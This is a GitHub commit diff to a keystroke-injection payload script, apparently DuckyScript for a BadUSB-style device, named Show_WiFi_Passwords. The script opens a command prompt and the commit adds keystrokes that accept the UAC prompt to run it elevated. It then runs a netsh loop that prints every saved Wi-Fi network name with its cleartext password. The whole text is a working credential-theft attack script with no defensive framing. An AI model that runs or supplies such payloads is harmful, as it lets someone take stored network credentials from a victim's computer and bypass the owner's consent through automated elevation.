Update Show_WiFi_Passwords.txt

This commit is contained in:
UberGuidoZ 2022-06-20 22:17:05 -07:00 committed by GitHub
parent 40871373f2
commit 64279a99bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,7 +2,10 @@ DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT Y
DELAY 1000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
ENTER